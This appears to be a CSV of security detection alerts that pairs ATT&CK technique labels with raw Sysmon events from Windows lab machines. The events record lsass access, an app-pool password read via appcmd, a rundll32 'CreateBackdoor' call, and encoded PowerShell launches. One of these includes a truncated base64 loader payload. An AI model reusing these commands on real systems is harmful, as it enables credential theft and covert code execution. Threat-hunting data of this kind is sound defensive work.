[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606895.720774,2019-04-18T21:01:35.720774+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T17:01:35.680716Z"">
</TimeCreated>
<EventRecordID>29</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""3288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 17:01:35.680</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\vaultcli.dll</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Credential Vault Client Library</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.731362,2019-05-27T05:29:17.731362+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;Filename: redirection.config&quot; /text:processmodel.password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:17.731362Z"">
</TimeCreated>
<EventRecordID>5898</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:17.691</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6D-5CEB-0000-00104474FF00</Data>
<Data Name=""ProcessId"">2448</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;Filename: redirection.config&quot; /text:processmodel.password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1003.001] Credential dump Thread Open to Lsass,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,Process ( \\VBOXSVR\HTools\voice_mail.msg.exe) attempted to access lsass process ( C:\Windows\System32\lsass.exe),8,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>8</EventID>
<Version>2</Version>
<Level>4</Level>
<Task>8</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T12:43:43.784179Z"">
</TimeCreated>
<EventRecordID>9066</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""316"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 12:43:43.784</Data>
<Data Name=""SourceProcessGuid"">365ABB72-4055-5CC8-0000-0010769D0B00</Data>
<Data Name=""SourceProcessId"">1532</Data>
<Data Name=""SourceImage"">\\VBOXSVR\HTools\voice_mail.msg.exe</Data>
<Data Name=""TargetProcessGuid"">365ABB72-3FE0-5CC8-0000-00107E590000</Data>
<Data Name=""TargetProcessId"">492</Data>
<Data Name=""TargetImage"">C:\Windows\System32\lsass.exe</Data>
<Data Name=""NewThreadId"">3656</Data>
<Data Name=""StartAddress"">0x001A0000</Data>
<Data Name=""StartModule""></Data>
<Data Name=""StartFunction""></Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.425419,2020-03-21T09:00:25.425419+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.421856Z"">
</TimeCreated>
<EventRecordID>243552</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.397</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-001033922000</Data>
<Data Name=""ProcessId"">6572</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.425419,2020-03-21T09:00:25.425419+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.421856Z"">
</TimeCreated>
<EventRecordID>243552</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.397</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-001033922000</Data>
<Data Name=""ProcessId"">6572</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.661261,2019-05-27T05:29:17.661261+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;Filename: redirection.config&quot; /text:processmodel.username ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:17.661261Z"">
</TimeCreated>
<EventRecordID>5895</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:17.621</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6D-5CEB-0000-00108270FF00</Data>
<Data Name=""ProcessId"">1340</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;Filename: redirection.config&quot; /text:processmodel.username</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.425419,2020-03-21T09:00:25.425419+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.421856Z"">
</TimeCreated>
<EventRecordID>243552</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.397</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-001033922000</Data>
<Data Name=""ProcessId"">6572</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1003 ] Credential Dumping ImageLoad,1555606894.689291,2019-04-18T21:01:34.689291+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T17:01:34.659248Z"">
</TimeCreated>
<EventRecordID>27</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""3288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 17:01:34.629</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\hid.dll</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Hid User Library</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606894.689291,2019-04-18T21:01:34.689291+04:00,,Threat,High,[T1003] Sysmon Event 7 ImageLoad - powershell.exe (PID 1200) loaded C:\Windows\System32\hid.dll which the Sysmon config tagged technique_id=T1003; note this event records a DLL load only and shows no handle to lsass.exe,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T17:01:34.659248Z"">
</TimeCreated>
<EventRecordID>27</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""3288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 17:01:34.629</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\hid.dll</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Hid User Library</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.581146,2019-05-27T05:29:17.581146+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.password ) - this reads the application pool identity password (credential access) and the parent is powershell.exe -nop -noni -enc launched from C:\Windows\Temp\ so Low understates it,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:17.581146Z"">
</TimeCreated>
<EventRecordID>5892</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:17.420</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6D-5CEB-0000-0010576BFF00</Data>
<Data Name=""ProcessId"">2928</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAd
